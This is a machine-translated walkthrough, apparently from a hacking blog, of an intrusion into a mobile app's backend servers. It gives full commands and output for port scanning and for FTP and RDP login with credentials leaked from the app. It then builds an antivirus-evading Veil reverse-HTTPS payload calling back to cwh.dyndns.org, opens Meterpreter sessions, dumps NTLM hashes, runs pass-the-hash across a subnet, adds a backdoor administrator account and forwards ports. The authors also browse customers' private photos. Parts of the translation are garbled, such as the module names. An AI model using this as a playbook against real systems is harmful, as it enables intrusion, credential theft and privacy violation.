Mobile app intrusion diary (lower)

《Mobile app intrusion diary (on)"Is widely praised after the release, and now the next set is available, I hope you will like it. [0x03]-server attack "in most cases, one or more web servers communicate with the client. Attacks on mobile app servers are similar to attacks on common web sites. In addition to finding web application vulnerabilities, you also need to scan the target host to see which services are running, and then scan the vulnerabilities to find potential vulnerabilities. Of course, you must perform these operations with permission ." -- SANS penetration test blog[0x03a]-ScanBased on the above, we have found the background IP addresses (203.60.240.180 and 203.60.240.183) from the source code. Next, we will use Nmap scanning to check its security. First, use nmap (http://nmap.org) to scan the target host to view open ports. For 203.60.240.180, Nmap scan result :---------------------

Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-07 12:31 ICTNmap scan report for 203.60.240.180Host is up (0.0047s latency).Not shown: 998 filtered portsPORT     STATE SERVICE  VERSION80/tcp   open  http     Microsoft IIS httpd 7.0443/tcp  open  ssl/http Microsoft IIS httpd 7.03389/tcp open  ms-wbt-server?Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at http://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 21.99 seconds

------------------- For 203.60.240.183, Nmap scan result: --------------------- [zeq3ul @ 12:35:12]-[~]> Nmap-sV-PN 203.60.240.183

Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-07 12:35 ICTNmap scan report for 203.60.240.183Host is up (0.0036s latency).Not shown: 997 filtered portsPORT     STATE SERVICE  VERSION21/tcp   open  ftp      Microsoft ftpdService Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at http://nmap.org/submit/.Nmap done: 1 IP address (1 host up) scanned in 16.38 seconds

--------------------- From the scan results, we found the Open Port, running IIS and Terminal Services on 203.60.240.180, and running FTP services on 203.60.240.183. It's time to pick our fruits. [0x03b]-Get PermissionsBecause we have found the username and password ("msec1s", "S1lentM! @ # $ Ec "). Then we can access the FTP service running on the server. FTP Server: 203.60.240.183 ---------------------

[zeq3ul@12:40:12]-[~]> ftp 203.60.240.183Connected to 203.60.140.183220 Microsoft FTP ServiceUser <203.60.140.183:<none>>: msec1s331 Password requiredPassword:230 User logged in.ftp> pwd257 "/" is current directory.ftp>

--------------------- Now we have logged on to the FTP server using the "msec1s" account. We were able to access contacts, photos, and videos of all customers. We hope to find some "interesting" photos or video clips, but we have found DICK !!! WTF (Baidu )!! We stopped searching. Kneel down... Move the target to the next host, 203.60.240.180. We tried to access it through the terminal service. Fortunately, we used the FTP username and password ("msec1s", "S1lentM! @ # $ Ec! Several services use the same account password ). Great! Use rdesktop to access the Remote Desktop ----------------- [zeq3ul @ 12:56:04]-[~]> Rdesktop-u msec1s-p S1lentM! @ # $ Ec 203.60.240.180 ------------------- In addition, the "msecls" account still has administrator permissions. It's getting better and better! [0x03c]-bypass anti-virus software. Many anti-virus software uses signatures to scan and kill viruses. If the software discovers the malicious software pattern, it is isolated or cleared. If no virus pattern is found in the file, the virus pattern is considered safe. Veil, a payload generation tool written by Blackhat security expert Chris Truncer, can help us accomplish this task well. Download the source code: https://www.javasertruncer.com/veil-a-payload-generator-to-bypass-antivirusand use of veil. You can refer to the original article Veil-bypassing the anti-virus software payload generator. Use our payload and msfveom shellcode and select Reverse HTTPS to our web server (cwh.dyndns.org). The command is as follows:

==================================================================Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013==================================================================[?] Use msfvenom or supply custom shellcode?1 - msfvenom (default)2 - Custom[>] Please enter the number of your choice: 1[?] What type of payload would you like?1 - Reverse TCP2 - Reverse HTTP3 - Reverse HTTPS0 - Main Menu>] Please enter the number of your choice: 3[?] What's the Local Host IP Address: cwh.dyndns.org[?] What's the LocalPort Number: 443---------------------------------------------------------------

Now we have received the payload.exe file. As long as the file is executed in windows, it will immediately try to connect to our server. [0x03d]-win the system !! It's time to win the system! Because you can use the remote desktop service (Port: enabled ). The running Metasploit payload(payload.exe) will connect (reverse_https) to the meterpreter payload on our server (cwh.dyndns.org. Then, we use hashdump to get the LM/NTLM hash on the server, but this is not feasible, because if you are a 64-bit system, but meterpreter is not running on a 64-bit system, it will fail, telling us that the version is incorrect (Meterpreter is a 32-bit program ). so we need to find a process to port and then rebound the program here. In this example, we port our process to the Winlogon process (64-bit. The process is as follows: ------------------- [zeq3ul @ 13:16:14]-[~]> Sudo msfconsole [sudo] password for zeq3ul:

Call trans opt: received. 2-19-98 13:18:48 REC:LocTrace program: runninghttp://metasploit.pro=[ metasploit v4.6.2-1 [core:4.6 api:1.0]+ -- --=[ 1113 exploits - 701 auxiliary - 192 post+ -- --=[ 300 payloads - 29 encoders - 8 nops

Msf> use exploit/multi/handler msf exploit (handler)> set PAYLOAD windows/meterpreter/reverse_https PAYLOAD => windows/meterpreter/reverse_https msf exploit (handler)> set LPORT 443 LPORT => 443 msf exploit (handler)> set LHOST cwh.dyndns.org LHOST => define msf exploit (handler)> set ExitOnSession false ExitOnSession => false msf exploit (handler)> exploit-j

[*] Exploit running as background job.[*] Started HTTPS reverse handler on https://cwh.dyndns.org:443/msf exploit(handler) > [*] Starting the payload handler...[*] 203.60.240.180:49160 Request received for /oOTJ...[*] 203.60.240.180:49160 Staging connection for target /oOTJ received...[*] Patched user-agent at offset 640488...[*] Patched transport at offset 640148...[*] Patched URL at offset 640216...[*] Patched Expiration Timeout at offset 640748...[*] Patched Communication Timeout at offset 640752...[*] Meterpreter session 1 opened (cwh.dyndns.org:443 -> 203.60.240.180:49160) at 2013-06-07 13:25:17 +0700sessions -lActive sessions===============Id  Type                   Information                                      Connection--  ----                   -----------                                      ----------1   meterpreter x86/win32  WIN-UUOFVQRLB13msec1s @ WIN-UUOFVQRLB13  cwh.dyndns.org:443 -> 203.60.240.180:49160 (203.60.240.180)msf exploit(handler) > sessions -i 1[*] Starting interaction with 1...meterpreter > sysinfoComputer        : WIN-UUOFVQRLB13OS              : Windows 2008 R2 (Build 7600).Architecture    : x64 (Current Process is WOW64)System Language : en_USMeterpreter     : x86/win32meterpreter > ps -S winlogonFiltering on process name...Process List============PID  PPID  Name          Arch    Session  User                 Path---  ----  ----          ----    -------  ----                 ----384  340   winlogon.exe  x86_64  1        NT AUTHORITYSYSTEM  C:WindowsSystem32winlogon.exemeterpreter > migrate 384[*] Migrating from 1096 to 384...[*] Migration completed successfully.

Meterpreter> sysinfo

Computer        : WIN-UUOFVQRLB13OS              : Windows 2008 R2 (Build 7600).Architecture    : x64System Language : en_USMeterpreter     : x64/win64

Meterpreter> run hashdump

[*] Obtaining the boot key...[*] Calculating the hboot key using SYSKEY c6b1281c29c15b25cfa14495b66ea816...[*] Obtaining the user list and keys...[*] Decrypting user keys...[*] Dumping password hints...No users with password hints on this system[*] Dumping password hashes...Administrator:500:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::msec1s:1000:aad3b435b51404eeaad3b435b51404ee:73778dadcbb3fbd800e5bb383d5ec1e3:::

--------------------- Now, we have obtained the hash on the target machine. Hash in hand. I have permissions ~~ [0x03e]-Not finished yetUnder normal circumstances, we need to crack the hash. It takes a lot of time to crack windows hash (ER, in fact, the password hash in windows is very good), so you don't want to spend too much time bypassing password verification? Passing hash password attacks may be a good method, the simplest way to use the "Pass hash Password Attack" is to use the built-in external xec module (exploit/windows/smb/external xec) of Metasploit ), this module can execute a payload that provides any verification function. This payload can forge a Windows SMB service administrator certificate (if you have an administrator password or hash), and then create a windows service on the target machine, then you can use this service to escalate permissions for the stepping stone. When you get the hash value of a windows system machine, this tool becomes your preferred penetration testing tool. The famous hacker Carlos Perez also wrote the batch xec_scanner version. If you are interested, you can find it through the following connection. Http://www.darkoperator.com/blog/2011/12/16/psexec-scanner-auxiliary-module.html --------------------- meterpreter> background [*] Backgrounding session 1... Msf exploit (handler)> use auxiliary/Alibaba/smb/export xec_audit msf auxiliary (export xec_salary)> show options

Module options (auxiliary/scanner/smb/psexec_scanner):Name       Current Setting                                                    Required  Description----       ---------------                                                    --------  -----------HANDLER    true                                                               no        Start an Exploit Multi Handler to receive the connectionLHOST                                                                         yes       Local Hosts for payload to connect.LPORT                                                                           yes       LocalPort for payload to connect.OPTIONS                                                                       no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.PAYLOAD    windows/meterpreter/reverse_tcp                                    yes       Payload to use against Windows hostRHOSTS                                                                        yes       Range of hosts to scan.SHARE      ADMIN$                                                             yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder shareSMBDomain  WORKGROUP                                                          yes       SMB DomainSMBPass                                                            no        SMB PasswordSMBUser                                                                        no        SMB UsernameTHREADS                                                                       yes       The number of concurrent threadsTYPE       manual                                                             no        Type of credentials to use, manual for provided one, db for those found on the database (accepted: db, manual)

Msf auxiliary (export xec_clock)> set LHOST cwh.dyndns.org LHOST => export msf auxiliary (export xec_clock)> set LPORT 8443 LPORT => 8443 msf auxiliary (export xec_clock)> set RHOSTS quota/24 RHOSTS => quota/24 msf auxiliary (cost xec_fee)> set SMBUser administrator SMBUser => administrator msf auxiliary (cost xec_fee)> set SMBPass quota: Cost SMBPass => quota: de26cce0356891a4a020e7c4957afc72 msf auxiliary (cost xec_fee)> set THREADS 10 THREADS => 10 msf auxiliary (cost xec_fee)> exploit

[*] Using the username and password provided[*] Starting exploit multi handler[*] Started reverse handler on cwh.dyndns.org:8443[*] Starting the payload handler...[*] Scanned 031 of 256 hosts (012% complete)[*] Scanned 052 of 256 hosts (020% complete)[*] Scanned 077 of 256 hosts (030% complete)[*] Scanned 111 of 256 hosts (043% complete)[*] Scanned 129 of 256 hosts (050% complete)[*] Scanned 154 of 256 hosts (060% complete)[*] 203.60.240.165:445 - TCP OPEN[*] Trying administrator:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72[*] 203.60.240.180:445 - TCP OPEN[*] Trying administrator:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72[*] Connecting to the server...[*] Authenticating to 203.60.240.165:445|WORKGROUP as user 'administrator'...[*] Connecting to the server...[*] Authenticating to 203.60.240.180:445|WORKGROUP as user 'administrator'...[*] Uploading payload...[*] Uploading payload...[*] Created ExigHylG.exe...[*] Created xMhdkXDt.exe...[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.180[svcctl] ...[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.165[svcctl] ...[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.180[svcctl] ...[*] Obtaining a service manager handle...[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.165[svcctl] ...[*] Obtaining a service manager handle...[*] Creating a new service (ZHBMTKgE - "MgHtGamQQzIQxKDJsGWvcgiAStFttWMt")...[*] Creating a new service (qJTBfPjT - "MhIpwSR")...[*] Closing service handle...[*] Closing service handle...[*] Opening service...[*] Opening service...[*] Starting the service...[*] Starting the service...[*] Removing the service...[*] Removing the service...[*] Sending stage (751104 bytes) to 203.60.240.180[*] Closing service handle...[*] Closing service handle...[*] Deleting xMhdkXDt.exe...[*] Deleting ExigHylG.exe...[*] Meterpreter session 2 opened (cwh.dyndns.org:8443 -> 203.60.240.180:49161) at 2013-07-02 13:40:42 +0700[*] Sending stage (751104 bytes) to 203.60.240.165[*] Meterpreter session 3 opened (cwh.dyndns.org:8443 -> 203.60.240.165:50181) at 2013-07-02 13:42:06 +0700[*] Scanned 181 of 256 hosts (070% complete)[*] Scanned 205 of 256 hosts (080% complete)[*] Scanned 232 of 256 hosts (090% complete)[*] Scanned 256 of 256 hosts (100% complete)[*] Auxiliary module execution completed

Msf auxiliary (export xec_sions)> sessions-l

Active sessions===============Id  Type                   Information                               Connection--  ----                   -----------                               ----------1   meterpreter x86/win32  WIN-UUOFVQRLB13msec1s @ WIN-UUOFVQRLB13  cwh.dyndns.org:443 -> 203.60.240.180:49160 (203.60.240.180)2   meterpreter x86/win32  NT AUTHORITYSYSTEM @ WIN-UUOFVQRLB13     cwh.dyndns.org:8443 -> 203.60.240.180:49161 (203.60.240.180)3   meterpreter x86/win32  NT AUTHORITYSYSTEM @ WIN-HDO6QC2QVIV     cwh.dyndns.org:8443 -> 203.60.240.165:50181 (203.60.240.165)

Msf auxiliary (export xec_sions)> sessions-I 3 [*] Starting interaction with 3... Meterpreter> getuid Server username: nt authoritysystem meterpreter> sysinfo

Computer        : WIN-HDO6QC2QVIVOS              : Windows 2008 R2 (Build 7600).Architecture    : x64 (Current Process is WOW64)System Language : en_USMeterpreter     : x86/win32meterpreter > shellProcess 2568 created.Channel 1 created.Microsoft Windows [Version 6.1.7600]Copyright (c) 2009 Microsoft Corporation.  All rights reserved.C:Windowssystem32>net user cwh 5plus4=10 /addnet user cwh 5plus4=10 /addThe command completed successfully.C:Windowssystem32>net localgroup administrators cwh /addnet localgroup administrators cwh /addThe command completed successfully.C:Windowssystem32>exit

--------------------- Now we need to process the next host (203.60.240.165 ). enter "netstat-an" to check the port opened on the target host. We found port 3389 is open, but we cannot log on directly because the port is filtered out by the firewall. But we can bypass it. We use the "portfwd" command in Meterpreter. Portfwd is a common method to provide attack hosts with direct access to the target host using the mongoting technology. Its principle is to automatically open another TCP connection, forward the target port to the port of the automatically opened connection. You can use the following commands to connect your attack host to your target host:

meterpreter > portfwd add -l 3389 -r 127.0.0.1 -p 3389[*] Local TCP relay created: 0.0.0.0:3389 <-> 127.0.0.1:3389

 

Finally, we use the following rdesktop command to connect to the target server (203.60.240.165): [zeq3ul @ 14:02:51]-[~]> Rdesktop-u cwh-p 5plus4 = 10 localhost was shot after so long, so cool !!! At this point, our attacks have been from the beginning of collecting information from mobile apps to the final Elevation of Privilege. The breakthrough in the middle is to find the account and password of the FTP server connected to it in the disassembly file of the mobile app, and then guess the password of another web server machine through a social engineering. When elevation of permission is followed by the pace of metasploit, it is an advanced use of MSF. In fact, it also regards the subsequent elevation of permission as an advanced tutorial for MSF elevation of permission.